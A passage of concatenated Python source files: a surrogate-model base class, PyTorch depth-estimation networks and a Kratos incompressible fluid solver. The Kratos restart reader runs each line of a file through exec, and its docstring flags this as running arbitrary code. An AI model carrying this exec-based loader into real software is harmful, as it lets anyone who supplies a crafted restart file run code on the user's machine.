                    yv = yv * enc.variables['xmax'] ** 2
                ym = enc.decode(ym)
        return ym, yv

    @abstractmethod
    def train(self, X, y, fixed_sigma_n=defaults['fixed_sigma_n']):
        r"""Trains the surrogate on input points X and model outputs y.
        Depending on the surrogate, the signature can vary.
        Parameters:
            X (ndarray): Input training points.
            y (ndarray): Observed output data.
            fixed_sigma_n (bool): Whether the noise $\sigma_n$ is fixed during optimization.
        """
        pass

    @abstractmethod
    def predict(self, Xpred, add_data_variance=True):
        r"""Predicts model output y for input Xpred based on surrogate.
        Parameters:
            Xpred (ndarray/list): Input points for prediction.
            add_data_variance (bool): Adds the data noise $\sigma_n^2$ to the prediction variance.
                This is especially useful for plotting.
        Returns:
            tuple: a tuple containing:
                - ymean (ndarray) Predicted output values at the test input points.
                - yvar (ndarray): Generally the uncertainty of the fit. For Gaussian Processes this is
                  the diagonal of the posterior covariance matrix.
        """
        pass

    @abstractmethod
    def save_model(self, path):
        """Saves the surrogate to a file. The file format can vary between surrogates.
        As default, the surrogate is saved to 'base_dir/model_{surrogate_label}.hdf5'.
        Parameters:
            path (str): Path including the file name, where the model should be saved.
        """
        pass

    @classmethod
    @abstractmethod
    def load_model(cls, path):
        """Loads a saved surrogate from a file. The file format can vary between surrogates.
        Identifies the surrogate by its class label in the file name.
        Parameters:
            path (str): Path including the file name, from where the model should be loaded.
        Returns:
            profit.sur.Surrogate: Instantiated surrogate model.
        """
        # Pick the longest registered label occurring in the path — i.e. the
        # most specific match — falling back to the configured default.
        label = defaults['surrogate']
        for f in filter(lambda l: l in path, cls.labels):
            if len(f) > len(label):
                label = f
        return cls[label].load_model(path)

    @classmethod
    @abstractmethod
    def from_config(cls, config, base_config):
        """Instantiates a surrogate based on the parameters given in the configuration file and delegates to child.
        Parameters:
            config (dict): Only the 'fit' part of the base_config.
            base_config (dict): The whole configuration parameters.
        """
        from .encoders import Encoder
        child = cls[config['surrogate']]
        # Either resume from a saved model or build a fresh one from config.
        if config.get('load'):
            child_instance = child.load_model(config['load'])
        else:
            child_instance = child.from_config(config, base_config)
        # Set global attributes
        child_instance.ndim = len(base_config['input'])
        child_instance.output_ndim = len(base_config['output'])
        child_instance.fixed_sigma_n = config['fixed_sigma_n']
        child_instance.encoder = [Encoder[func](cols, out) for func, cols, out in config['encoder']]
        return child_instance

    def plot(self, Xpred=None, independent=None, show=False, ref=None, add_data_variance=True, axes=None):
        r"""Simple plotting for dimensions <= 2.
        Fore more sophisticated plots use the command 'profit ui'.
        Parameters:
            Xpred (ndarray): Prediction points where the fit is plotted. If None, it is inferred from the
                training points.
            independent (dict): Dictionary of independent variables from config.
            show (bool): If the figure should be shown directly.
            ref (ndarray): Reference function which is fitted.
            add_data_variance (bool): Adds the data noise $\sigma_n^2$ to the prediction variance.
            axes (matplotlib.pyplot.axes): Axes object to insert the plot into. If None, a new figure is created.
        """
        import matplotlib.pyplot as plt
        if Xpred is None:
            Xpred = self.default_Xpred()
        ypred, yvarpred = self.predict(Xpred, add_data_variance=add_data_variance)
        ystd_pred = np.sqrt(yvarpred)
        if independent:
            # 2D with one input parameter and one independent variable.
            if self.ndim == 1 and ypred.ndim == 2:
                ax = axes or plt.axes(projection='3d')
                xind = np.hstack([v['value'] for v in independent.values()])
                xtgrid = np.meshgrid(*[xind, self.Xtrain])
                xgrid = np.meshgrid(*[xind, Xpred])
                # Training curves in blue, fit surface in red, +-2 sigma in grey.
                for i in range(self.Xtrain.shape[0]):
                    ax.plot(xtgrid[0][i], xtgrid[1][i], self.ytrain[i], color='blue', linewidth=2)
                ax.plot_surface(xgrid[0], xgrid[1], ypred, color='red', alpha=0.8)
                ax.plot_surface(xgrid[0], xgrid[1], ypred + 2 * ystd_pred, color='grey', alpha=0.6)
                ax.plot_surface(xgrid[0], xgrid[1], ypred - 2 * ystd_pred, color='grey', alpha=0.6)
            else:
                raise NotImplementedError("Plotting is only implemented for dimensions <= 2. Use profit ui instead.")
        else:
            if self.ndim == 1 and ypred.shape[-1] == 1:
                # Only one input parameter to plot.
                ax = axes or plt.axes()
                if ref:
                    ax.plot(Xpred, ref(Xpred), color='red')
                ax.plot(Xpred, ypred)
                ax.scatter(self.Xtrain, self.ytrain, marker='x', s=50, c='k')
                # Shaded band = +-2 standard deviations around the mean.
                ax.fill_between(Xpred.flatten(),
                                ypred.flatten() + 2 * ystd_pred.flatten(), ypred.flatten() - 2 * ystd_pred.flatten(),
                                color='grey', alpha=0.6)
            elif self.ndim == 2 and ypred.shape[-1] == 1:
                # Two fitted input variables.
                ax = axes or plt.axes(projection='3d')
                ypred = ypred.flatten()
                ystd_pred = ystd_pred.flatten()
                ax.scatter(self.Xtrain[:, 0], self.Xtrain[:, 1], self.ytrain, color='red', alpha=0.8)
                ax.plot_trisurf(Xpred[:, 0], Xpred[:, 1], ypred, color='red', alpha=0.8)
                ax.plot_trisurf(Xpred[:, 0], Xpred[:, 1], ypred + 2 * ystd_pred, color='grey', alpha=0.6)
                ax.plot_trisurf(Xpred[:, 0], Xpred[:, 1], ypred - 2 * ystd_pred, color='grey', alpha=0.6)
            elif self.ndim == 1 and self.output_ndim == 2:
                # One input variable and two outputs
                ax = axes or plt.axes()
                for d in range(self.output_ndim):
                    yp = ypred[:, d]
                    ystd_p = ystd_pred[:, d]
                    ax.scatter(self.Xtrain, self.ytrain[:, d], alpha=0.8)
                    ax.plot(Xpred, yp)
                    ax.fill_between(Xpred.flatten(), yp + 2 * ystd_p, yp - 2 * ystd_p, alpha=0.6)
            else:
                raise NotImplementedError("Plotting is only implemented for dimension <= 2. Use profit ui instead.")
        if show:
            plt.show()

    def default_Xpred(self):
        """Infer prediction values from training points in each dimension.
        Currently a dense grid is created. This becomes inefficient for > 3 dimensions.
        Returns:
            ndarray: Prediction points.
        """
        if self.ndim <= 3:
            # 50 evenly spaced points per dimension spanning the training range.
            minval = self.Xtrain.min(axis=0)
            maxval = self.Xtrain.max(axis=0)
            npoints = [50] * len(minval)
            xpred = [np.linspace(minv, maxv, n) for minv, maxv, n in zip(minval, maxval, npoints)]
            return np.hstack([xi.flatten().reshape(-1, 1) for xi in np.meshgrid(*xpred)])
        else:
            raise RuntimeError("Require x for prediction in > 3 dimensions!")
|
from .trainer import Trainer
from .evaluator import Evaluator
from .model import ModelFactory
|
"""
From https://github.com/fangchangma/sparse-to-dense.pytorch
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.models
import collections
import math
class VariationalDecoderNet(torch.nn.Module):
    """Conditional variational decoder.

    A two-channel conditioning image is downsampled through a small CNN
    (``label_input``), a latent code is sampled with the reparametrization
    trick and upsampled (``unembedder``), and the two feature maps are
    concatenated and decoded through transposed convolutions into two
    single-channel heads ("dropout" and "noise"), concatenated on the
    channel axis.
    """

    def __init__(self, encoded_dims=100):
        """Args:
            encoded_dims: Dimensionality of the latent code ``z``.
        """
        super(VariationalDecoderNet, self).__init__()
        filters = 32
        # conditional input: downsampling branch for the 2-channel label image
        self.label_input = nn.Sequential(
            nn.Conv2d(2, filters, 8, 2, 3),
            nn.LeakyReLU(.2),
            nn.Conv2d(filters, filters * 2, 8, 2, 3),
            nn.BatchNorm2d(filters * 2),
            nn.LeakyReLU(.2),
            nn.Conv2d(filters * 2, filters * 4, 8, 2, 3),
            nn.BatchNorm2d(filters * 4),
            nn.LeakyReLU(.2),
            nn.Conv2d(filters * 4, filters * 8, 8, 2, 3),
            nn.BatchNorm2d(filters * 8),
            nn.LeakyReLU(.2),
            nn.Conv2d(filters * 8, filters * 8, 8, 2, 3),
            nn.BatchNorm2d(filters * 8),
            nn.LeakyReLU(.2)
        )
        # upsample the latent vector to a feature map
        self.unembedder = nn.Sequential(
            nn.ConvTranspose2d(encoded_dims, filters * 8, 8, 1, 0),
            nn.BatchNorm2d(filters * 8),
            nn.LeakyReLU(.2),
        )
        self.hidden1 = nn.Sequential(
            nn.ConvTranspose2d(filters * 16, filters * 8, 8, 2, 3),
            nn.BatchNorm2d(filters * 8),
            nn.LeakyReLU(.2),
        )
        self.hidden2 = nn.Sequential(
            nn.ConvTranspose2d(filters * 8, filters * 4, 8, 2, 3),
            nn.BatchNorm2d(filters * 4),
            nn.LeakyReLU(.2),
        )
        self.hidden3 = nn.Sequential(
            nn.ConvTranspose2d(filters * 4, filters * 2, 8, 2, 3),
            nn.BatchNorm2d(filters * 2),
            nn.LeakyReLU(.2),
        )
        # "dropout" output head
        self.hidden4_dropout = nn.Sequential(
            nn.ConvTranspose2d(filters * 2, filters, 8, 2, 3),
            nn.BatchNorm2d(filters),
            nn.LeakyReLU(.2),
        )
        self.out_dropout = nn.Sequential(
            nn.ConvTranspose2d(filters, 1, 8, 2, 3),
            nn.Tanh()
        )
        # "noise" output head
        self.hidden4_noise = nn.Sequential(
            nn.ConvTranspose2d(filters * 2, filters, 8, 2, 3),
            nn.BatchNorm2d(filters),
            nn.LeakyReLU(.2),
        )
        self.out_noise = nn.Sequential(
            nn.ConvTranspose2d(filters, 1, 8, 2, 3),
            nn.Tanh()
        )

    def weight_init(self, mean, std):
        """Re-initialize all submodules with Gaussian weights.

        NOTE(review): relies on a module-level ``normal_init`` helper that is
        not defined in this file — confirm it exists wherever this is called.
        """
        for m in self._modules:
            normal_init(self._modules[m], mean, std)

    def reparametrize(self, mu, sigma):
        """Sample ``z ~ N(mu, exp(sigma))`` via the reparametrization trick.

        ``sigma`` is interpreted as a log-variance: std = exp(sigma / 2).
        """
        std = sigma.mul(.5).exp_()
        # randn_like creates eps on the same device/dtype as std. This
        # replaces the old torch.autograd.Variable / manual CUDA branch,
        # which referenced an un-imported `Variable` and raised NameError.
        eps = torch.randn_like(std)
        return eps.mul(std).add_(mu)

    def generate(self, z, label):
        """Decode latent code ``z`` conditioned on ``label`` into the
        2-channel (dropout, noise) output."""
        x0 = self.unembedder(z)
        x1 = self.label_input(label)
        x = torch.cat([x0, x1], 1)
        x = self.hidden1(x)
        x = self.hidden2(x)
        x = self.hidden3(x)
        x0 = self.hidden4_dropout(x)
        x0 = self.out_dropout(x0)
        x1 = self.hidden4_noise(x)
        x1 = self.out_noise(x1)
        x = torch.cat([x0, x1], 1)
        return x

    def forward(self, mu, sigma, label):
        """Sample a latent code, L2-normalize it and decode it."""
        # reparametrization trick
        z = self.reparametrize(mu, sigma)
        z = nn.functional.normalize(z, p=2, dim=1)
        x = self.generate(z, label)
        return x
class Unpool(nn.Module):
    """stride x stride unpooling with zero padding.

    Each input value is placed in the top-left corner of a stride x stride
    output block; the remaining positions are zero. Implemented as a grouped
    transposed convolution with a fixed [1, 0; 0, 0] kernel per channel.
    """

    def __init__(self, num_channels, stride=2):
        """Args:
            num_channels: Number of input (= output) channels.
            stride: Upsampling factor per spatial dimension.
        """
        super(Unpool, self).__init__()
        self.num_channels = num_channels
        self.stride = stride
        # Fixed, non-trainable kernel [1, 0; 0, 0] per channel. Registered
        # as a buffer so .to()/.cuda() moves it with the module — the old
        # version hard-coded .cuda() and could not run on CPU.
        weights = torch.zeros(num_channels, 1, stride, stride)
        weights[:, :, 0, 0] = 1
        self.register_buffer('weights', weights)

    def forward(self, x):
        return F.conv_transpose2d(x, self.weights, stride=self.stride, groups=self.num_channels)
def weights_init(m):
    """He-style Gaussian initialization for conv / deconv filters.

    Conv and transposed-conv weights are drawn from N(0, sqrt(2/n)) where
    n counts kernel elements times out (conv) or in (deconv) channels;
    batch-norm scales are set to 1. All biases are zeroed.
    """
    if isinstance(m, nn.Conv2d):
        fan = m.out_channels * m.kernel_size[0] * m.kernel_size[1]
        m.weight.data.normal_(0, math.sqrt(2. / fan))
        if m.bias is not None:
            m.bias.data.zero_()
    elif isinstance(m, nn.ConvTranspose2d):
        fan = m.in_channels * m.kernel_size[0] * m.kernel_size[1]
        m.weight.data.normal_(0, math.sqrt(2. / fan))
        if m.bias is not None:
            m.bias.data.zero_()
    elif isinstance(m, nn.BatchNorm2d):
        m.weight.data.fill_(1)
        m.bias.data.zero_()
class Decoder(nn.Module):
    """Base class for the upsampling decoders.

    Subclasses populate ``layer1`` .. ``layer5``; ``forward`` interleaves
    those stages with encoder skip connections, zero-padding each skip
    tensor so its spatial size matches the corresponding decoder stage.
    """

    # Accepted decoder names (consumed by choose_decoder).
    names = ['deconv2', 'deconv3', 'deconv5', 'deconv8', 'upconv', 'upproj']

    def __init__(self):
        super(Decoder, self).__init__()
        # Filled in by subclasses.
        self.layer1 = None
        self.layer2 = None
        self.layer3 = None
        self.layer4 = None
        self.layer5 = None
        # Zero paddings (left, right, top, bottom) aligning the skips.
        self.skip4_pad = nn.ZeroPad2d((1, 0, 1, 0))
        self.skip3_pad = nn.ZeroPad2d((1, 1, 2, 1))
        self.skip2_pad = nn.ZeroPad2d((2, 2, 4, 3))
        self.skip1_pad = nn.ZeroPad2d((4, 4, 7, 7))

    def forward(self, x, skip1=None, skip2=None, skip3=None, skip4=None):
        padded1 = self.skip1_pad(skip1)
        padded2 = self.skip2_pad(skip2)
        padded3 = self.skip3_pad(skip3)
        padded4 = self.skip4_pad(skip4)
        out = self.layer1(x)                          # connects to skip4
        out = self.layer2(torch.cat((out, padded4), 1))  # connects to skip3
        out = self.layer3(torch.cat((out, padded3), 1))  # connects to skip2
        out = self.layer4(torch.cat((out, padded2), 1))  # connects to skip1
        return self.layer5(torch.cat((out, padded1), 1))
class DeConv(Decoder):
    """Decoder built from stride-2 transposed convolutions of a fixed
    kernel size."""

    def __init__(self, in_channels, kernel_size):
        assert kernel_size>=2, "kernel_size out of range: {}".format(kernel_size)
        super(DeConv, self).__init__()

        def make_stage(c_in, c_out=None):
            # Each stage doubles the spatial resolution (stride 2); the
            # padding / output_padding pair is chosen so shapes work exactly.
            pad = (kernel_size - 1) // 2
            out_pad = kernel_size % 2
            assert -2 - 2*pad + kernel_size + out_pad == 0, "deconv parameters incorrect"
            if c_out is None:
                c_out = c_in // 2
            stage_name = "deconv{}".format(kernel_size)
            return nn.Sequential(collections.OrderedDict([
                (stage_name, nn.ConvTranspose2d(c_in, c_out, kernel_size,
                                                2, pad, out_pad, bias=False)),
                ('batchnorm', nn.BatchNorm2d(c_out)),
                ('relu', nn.ReLU(inplace=True)),
            ]))

        # Input channel counts account for the skip tensors that
        # Decoder.forward concatenates between stages.
        self.layer1 = make_stage(in_channels, in_channels // 2)
        self.layer2 = make_stage(in_channels, in_channels // 4)
        self.layer3 = make_stage(in_channels // 2, in_channels // 8)
        self.layer4 = make_stage(in_channels // 4, in_channels // 8)
        self.layer5 = make_stage(in_channels // 4, in_channels // 16)
class UpConv(Decoder):
    """Decoder of four upconv stages, each halving the channel count while
    doubling the feature-map size."""

    def upconv_module(self, in_channels):
        """Build one unpool -> 5x5 conv -> batchnorm -> ReLU stage."""
        half = in_channels // 2
        return nn.Sequential(collections.OrderedDict([
            ('unpool', Unpool(in_channels)),
            ('conv', nn.Conv2d(in_channels, half, kernel_size=5, stride=1, padding=2, bias=False)),
            ('batchnorm', nn.BatchNorm2d(half)),
            ('relu', nn.ReLU()),
        ]))

    def __init__(self, in_channels):
        super(UpConv, self).__init__()
        channels = in_channels
        for stage in range(1, 5):
            setattr(self, 'layer{}'.format(stage), self.upconv_module(channels))
            channels //= 2
class UpProj(Decoder):
    """Decoder of four up-projection modules, each halving the channel
    count while doubling the feature-map size."""

    class UpProjModule(nn.Module):
        """Residual up-projection block.

        An Unpool feeds two parallel branches whose outputs are summed and
        passed through a final ReLU:
          * upper:  5x5 conv -> batchnorm -> ReLU -> 3x3 conv -> batchnorm
          * bottom: 5x5 conv -> batchnorm
        """

        def __init__(self, in_channels):
            super(UpProj.UpProjModule, self).__init__()
            half = in_channels // 2
            self.unpool = Unpool(in_channels)
            self.upper_branch = nn.Sequential(collections.OrderedDict([
                ('conv1', nn.Conv2d(in_channels, half, kernel_size=5, stride=1, padding=2, bias=False)),
                ('batchnorm1', nn.BatchNorm2d(half)),
                ('relu', nn.ReLU()),
                ('conv2', nn.Conv2d(half, half, kernel_size=3, stride=1, padding=1, bias=False)),
                ('batchnorm2', nn.BatchNorm2d(half)),
            ]))
            self.bottom_branch = nn.Sequential(collections.OrderedDict([
                ('conv', nn.Conv2d(in_channels, half, kernel_size=5, stride=1, padding=2, bias=False)),
                ('batchnorm', nn.BatchNorm2d(half)),
            ]))
            self.relu = nn.ReLU()

        def forward(self, x):
            unpooled = self.unpool(x)
            merged = self.upper_branch(unpooled) + self.bottom_branch(unpooled)
            return self.relu(merged)

    def __init__(self, in_channels):
        super(UpProj, self).__init__()
        channels = in_channels
        for stage in range(1, 5):
            setattr(self, 'layer{}'.format(stage), self.UpProjModule(channels))
            channels //= 2
def choose_decoder(decoder, in_channels):
    """Instantiate a decoder by name.

    Args:
        decoder: One of 'deconvN' (N a single-digit kernel size, e.g.
            'deconv3'), 'upproj' or 'upconv'.
        in_channels: Number of channels fed into the decoder.

    Returns:
        Decoder: The requested decoder instance.

    Raises:
        ValueError: If the name is unknown or malformed.
    """
    if decoder.startswith('deconv'):
        # Name must be exactly 'deconv' plus one digit.
        if len(decoder) != 7 or not decoder[6].isdigit():
            raise ValueError("invalid option for decoder: {}".format(decoder))
        return DeConv(in_channels, int(decoder[6]))
    elif decoder == "upproj":
        return UpProj(in_channels)
    elif decoder == "upconv":
        return UpConv(in_channels)
    # Raise instead of `assert False` so the check survives `python -O`.
    raise ValueError("invalid option for decoder: {}".format(decoder))
class ResNet(nn.Module):
    """Encoder-decoder network with a torchvision ResNet backbone.

    The ResNet stem and four residual stages act as the encoder; their
    intermediate activations (x1..x4) are handed to the decoder as skip
    connections. The decoder is selected by name via ``choose_decoder``
    and the single-channel output is bilinearly resized to ``output_size``.
    """

    def __init__(self, layers, decoder, output_size, in_channels=3, pretrained=True):
        # layers: ResNet depth (18/34/50/101/152).
        # decoder: decoder name accepted by choose_decoder.
        # output_size: (H, W) of the final bilinear upsampling.
        # in_channels: input channels; a fresh stem is built if != 3.
        # pretrained: load ImageNet weights for the backbone.
        if layers not in [18, 34, 50, 101, 152]:
            raise RuntimeError('Only 18, 34, 50, 101, and 152 layer model are defined for ResNet. Got {}'.format(layers))
        super(ResNet, self).__init__()
        # Instantiate the torchvision backbone by name, e.g. 'resnet50'.
        pretrained_model = torchvision.models.__dict__['resnet{}'.format(layers)](pretrained=pretrained)
        if in_channels == 3:
            # Reuse the pretrained stem as-is.
            self.conv1 = pretrained_model._modules['conv1']
            self.bn1 = pretrained_model._modules['bn1']
        else:
            # Non-RGB input: build and re-initialize a fresh stem.
            self.conv1 = nn.Conv2d(in_channels, 64, kernel_size=7, stride=2, padding=3, bias=False)
            self.bn1 = nn.BatchNorm2d(64)
            weights_init(self.conv1)
            weights_init(self.bn1)
        self.output_size = output_size
        self.relu = pretrained_model._modules['relu']
        self.maxpool = pretrained_model._modules['maxpool']
        self.layer1 = pretrained_model._modules['layer1']
        self.layer2 = pretrained_model._modules['layer2']
        self.layer3 = pretrained_model._modules['layer3']
        self.layer4 = pretrained_model._modules['layer4']
        # clear memory
        del pretrained_model
        # define number of intermediate channels
        # (basic blocks end at 512 channels, bottleneck blocks at 2048)
        if layers <= 34:
            num_channels = 512
        elif layers >= 50:
            num_channels = 2048
        # self.conv2 = nn.Conv2d(num_channels,num_channels//2,kernel_size=1,bias=False)
        # self.bn2 = nn.BatchNorm2d(num_channels//2)
        # self.decoder = choose_decoder(decoder, num_channels//2)
        self.conv2 = nn.Conv2d(num_channels,num_channels,kernel_size=1,bias=False)
        self.bn2 = nn.BatchNorm2d(num_channels)
        self.decoder = choose_decoder(decoder, num_channels)
        # setting bias=true doesn't improve accuracy
        # self.conv3 = nn.Conv2d(num_channels//32,1,kernel_size=3,stride=1,padding=1,bias=False)
        self.conv3 = nn.Conv2d(num_channels//16,1,kernel_size=3,stride=1,padding=1,bias=False)
        # self.conv3 = nn.Conv2d(num_channels//64,1,kernel_size=3,stride=1,padding=1,bias=False)
        self.bilinear = nn.Upsample(size=self.output_size, mode='bilinear', align_corners=True)
        # weight init (only the non-pretrained head and decoder)
        self.conv2.apply(weights_init)
        self.bn2.apply(weights_init)
        self.decoder.apply(weights_init)
        self.conv3.apply(weights_init)

    def forward(self, x):
        # resnet encoder; x1..x4 are kept as decoder skip connections
        x1 = self.conv1(x)
        x = self.bn1(x1)
        x = self.relu(x)
        x = self.maxpool(x)
        x2 = self.layer1(x)
        x3 = self.layer2(x2)
        x4 = self.layer3(x3)
        x = self.layer4(x4)
        x = self.conv2(x)
        x = self.bn2(x)
        # decoder with skip connections, then 3x3 head and bilinear resize
        x = self.decoder(x, x1, x2, x3, x4)
        x = self.conv3(x)
        x = self.bilinear(x)
        return x
|
from __future__ import print_function, absolute_import, division #makes KratosMultiphysics backward compatible with python 2.6 and 2.7
# -*- coding: utf-8 -*-
# importing the Kratos Library
from KratosMultiphysics import *
from KratosMultiphysics.IncompressibleFluidApplication import *
# Check that KratosMultiphysics was imported in the main script
CheckForPreviousImport()
def AddVariables(model_part):
    """Register every nodal solution-step variable required by the
    fractional-step incompressible fluid solver on the given model part."""
    solver_variables = (
        VELOCITY,
        FRACT_VEL,
        MESH_VELOCITY,
        PRESSURE,
        PRESSURE_OLD_IT,
        PRESS_PROJ,
        CONV_PROJ,
        NODAL_MASS,
        BODY_FORCE,
        DENSITY,
        VISCOSITY,
        EXTERNAL_PRESSURE,
        FLAG_VARIABLE,
        DISPLACEMENT,
        IS_STRUCTURE,
        IS_INTERFACE,
        ARRHENIUS,
    )
    for variable in solver_variables:
        model_part.AddNodalSolutionStepVariable(variable)
    print("variables for the incompressible fluid solver added correctly")
def AddDofs(model_part):
    """Add the pressure and (fractional) velocity degrees of freedom to
    every node of the model part."""
    dof_variables = (
        PRESSURE,
        FRACT_VEL_X, FRACT_VEL_Y, FRACT_VEL_Z,
        VELOCITY_X, VELOCITY_Y, VELOCITY_Z,
    )
    for node in model_part.Nodes:
        for dof in dof_variables:
            node.AddDof(dof)
    print("dofs for the incompressible fluid solver added correctly")
# def ReadRestartFile(FileName,nodes):
# aaa = __import__(FileName)
# aaa.Restart(nodes)
def ReadRestartFile(FileName, nodes):
    """Execute every line of a restart file as Python code.

    The executed lines may refer to the local name ``NODES`` (bound to the
    ``nodes`` argument) to restore nodal data.

    SECURITY NOTE: ``exec`` runs arbitrary code from the file — only read
    restart files from a trusted source.

    Args:
        FileName: Path of the restart file.
        nodes: Node container exposed to the executed lines as ``NODES``.
    """
    NODES = nodes
    # Context manager guarantees the handle is closed (it was leaked before).
    with open(FileName) as restart_file:
        for line in restart_file:
            exec(line)
class IncompressibleFluidSolver:
    """Fractional-step strategy wrapper for the incompressible fluid problem.

    Configures the velocity/pressure linear solvers, builds the Kratos
    FractionalStepStrategy, and manages slip conditions, optional mesh
    refinement, turbulence models and restart output.
    """

    def __init__(self, model_part, domain_size):
        """Store the model part and set default solver parameters; the
        actual strategy is built later in Initialize()."""
        # neighbour search
        number_of_avg_elems = 10
        number_of_avg_nodes = 10
        self.neighbour_search = FindNodalNeighboursProcess(
            model_part, number_of_avg_elems, number_of_avg_nodes)
        self.model_part = model_part
        self.domain_size = domain_size
        # assignation of parameters to be used
        self.vel_toll = 0.001
        self.press_toll = 0.001
        self.max_vel_its = 6
        self.max_press_its = 3
        self.time_order = 2
        self.CalculateReactions = False
        self.ReformDofAtEachIteration = False
        self.CalculateNormDxFlag = True
        self.laplacian_form = 2
        # 1 = laplacian, 2 = Discrete Laplacian
        self.predictor_corrector = False
        self.echo_level = 0
        # definition of the solvers
        pDiagPrecond = DiagonalPreconditioner()
        # pILUPrecond = ILU0Preconditioner()
        # self.velocity_linear_solver = BICGSTABSolver(1e-6, 5000,pDiagPrecond)
        # self.pressure_linear_solver = BICGSTABSolver(1e-9, 5000,pILUPrecond)
        self.velocity_linear_solver = BICGSTABSolver(1e-6, 5000, pDiagPrecond)
        # self.pressure_linear_solver = BICGSTABSolver(1e-3, 5000,pILUPrecond)
        self.pressure_linear_solver = BICGSTABSolver(1e-3, 5000, pDiagPrecond)
        self.dynamic_tau = 0.001
        self.activate_tau2 = False
        # handling slip condition
        self.slip_conditions_initialized = False
        self.create_slip_conditions = GenerateSlipConditionProcess(
            self.model_part, domain_size)
        self.compute_reactions = False

    def Initialize(self):
        """Build the fractional-step strategy and the slip conditions."""
        (self.neighbour_search).Execute()
        self.model_part.ProcessInfo.SetValue(DYNAMIC_TAU, self.dynamic_tau)
        self.model_part.ProcessInfo.SetValue(
            ACTIVATE_TAU2, self.activate_tau2)
        self.domain_size = int(self.domain_size)
        self.laplacian_form = int(self.laplacian_form)
        self.solver_configuration = FractionalStepConfiguration(
            self.model_part,
            self.velocity_linear_solver,
            self.pressure_linear_solver,
            self.domain_size,
            self.laplacian_form)
        # Normalize user-set attributes (they may have been overwritten
        # with strings by external configuration scripts).
        self.ReformDofAtEachIteration = bool(self.ReformDofAtEachIteration)
        self.vel_toll = float(self.vel_toll)
        self.press_toll = float(self.press_toll)
        self.max_vel_its = int(self.max_vel_its)
        self.max_press_its = int(self.max_press_its)
        self.time_order = int(self.time_order)
        self.domain_size = int(self.domain_size)
        self.predictor_corrector = bool(self.predictor_corrector)
        self.solver = FractionalStepStrategy(
            self.model_part,
            self.solver_configuration,
            self.ReformDofAtEachIteration,
            self.vel_toll,
            self.press_toll,
            self.max_vel_its,
            self.max_press_its,
            self.time_order,
            self.domain_size,
            self.predictor_corrector)
        self.solver.Check()
        self.solver.ApplyFractionalVelocityFixity()
        # generating the slip conditions
        self.create_slip_conditions.Execute()
        (self.solver).SetSlipProcess(self.create_slip_conditions)
        self.slip_conditions_initialized = True
        (self.solver).SetEchoLevel(self.echo_level)
        print("finished initialization of the fluid strategy")

    def Solve(self):
        """Advance the solution one step, rebuilding dof fixity / slip
        conditions when required."""
        if(self.ReformDofAtEachIteration):
            self.solver.ApplyFractionalVelocityFixity()
            (self.neighbour_search).Execute()
            self.slip_conditions_initialized = False
        if(self.slip_conditions_initialized == False):
            self.create_slip_conditions.Execute()
            (self.solver).SetSlipProcess(self.create_slip_conditions)
            self.slip_conditions_initialized = True
        print("just before solve")
        print(self.model_part)
        (self.solver).Solve()
        if(self.compute_reactions):
            self.solver.ComputeReactions(REACTION)
        # (self.create_slip_conditions).SetNormalVelocityToZero()
        # (self.create_slip_conditions).ApplyEdgeConstraints()

    def Clear(self):
        """Clear internal strategy data.

        NOTE(review): slip_conditions_initialized is set to True here, which
        looks inconsistent with the rebuild logic in Solve() — confirm
        whether False was intended before changing it.
        """
        (self.solver).Clear()
        self.slip_conditions_initialized = True

    def AdaptMesh(self):
        """Locally refine the (3D) mesh based on ERROR_RATIO."""
        import KratosMultiphysics.MeshingApplication as KMesh
        admissible_ratio = 0.05
        max_levels = 2
        refinement_utils = KMesh.RefinementUtilities()
        if(self.domain_size == 2):
            # Raising a string is a TypeError in Python 3; raise a real
            # exception type instead.
            raise NotImplementedError("error refine in 2d not yet implemented")
        else:
            Refine = KMesh.LocalRefineTetrahedraMesh(self.model_part)
        # just to be sure nothing is done
        (self.model_part).ProcessInfo[FRACTIONAL_STEP] = 10
        refinement_utils.MarkForRefinement(
            ERROR_RATIO,
            self.model_part,
            admissible_ratio,
            max_levels)
        self.Clear()
        refine_on_reference = False
        interpolate_internal_variables = False
        Refine.LocalRefineMesh(
            refine_on_reference,
            interpolate_internal_variables)
        (self.neighbour_search).Execute()
        self.slip_conditions_initialized = False
        print("Refining finished")

    def WriteRestartFile(self, FileName):
        """Dump nodes, elements and the main nodal variables to
        ``FileName + '.mdpa'`` for later restart."""
        restart_file = open(FileName + ".mdpa", 'w')
        import new_restart_utilities
        new_restart_utilities.PrintProperties(restart_file)
        new_restart_utilities.PrintNodes(self.model_part.Nodes, restart_file)
        new_restart_utilities.PrintElements(
            "Fluid3D",
            self.model_part.Elements,
            restart_file)
        new_restart_utilities.PrintRestart_ScalarVariable(
            VELOCITY_X,
            "VELOCITY_X",
            self.model_part.Nodes,
            restart_file)
        new_restart_utilities.PrintRestart_ScalarVariable(
            VELOCITY_Y,
            "VELOCITY_Y",
            self.model_part.Nodes,
            restart_file)
        new_restart_utilities.PrintRestart_ScalarVariable(
            VELOCITY_Z,
            "VELOCITY_Z",
            self.model_part.Nodes,
            restart_file)
        new_restart_utilities.PrintRestart_ScalarVariable(
            PRESSURE,
            "PRESSURE",
            self.model_part.Nodes,
            restart_file)
        new_restart_utilities.PrintRestart_ScalarVariable(
            VISCOSITY,
            "VISCOSITY",
            self.model_part.Nodes,
            restart_file)
        new_restart_utilities.PrintRestart_ScalarVariable(
            DENSITY,
            "DENSITY",
            self.model_part.Nodes,
            restart_file)
        restart_file.close()

    def ActivateSmagorinsky(self, C):
        """Enable the Smagorinsky turbulence model with constant C."""
        for elem in self.model_part.Elements:
            elem.SetValue(C_SMAGORINSKY, C)

    def ActivateSpalartAllmaras(self, wall_nodes, DES, CDES=1.0):
        """Attach a Spalart-Allmaras turbulence model (optionally in DES
        mode) using wall distances computed from ``wall_nodes``."""
        import KratosMultiphysics.FluidDynamicsApplication as KCFD
        for node in wall_nodes:
            node.SetValue(IS_VISITED, 1.0)
        distance_calculator = BodyDistanceCalculationUtils()
        distance_calculator.CalculateDistances2D(
            self.model_part.Elements, DISTANCE, 100.0)
        non_linear_tol = 0.001
        max_it = 10
        reform_dofset = self.ReformDofAtEachIteration
        time_order = self.time_order
        pPrecond = DiagonalPreconditioner()
        turbulence_linear_solver = BICGSTABSolver(1e-20, 5000, pPrecond)
        turbulence_model = KCFD.SpalartAllmarasTurbulenceModel(
            self.model_part,
            turbulence_linear_solver,
            self.domain_size,
            non_linear_tol,
            max_it,
            reform_dofset,
            time_order)
        turbulence_model.AdaptForFractionalStep()
        if(DES):
            turbulence_model.ActivateDES(CDES)
        self.solver.AddInitializeIterationProcess(turbulence_model)
|
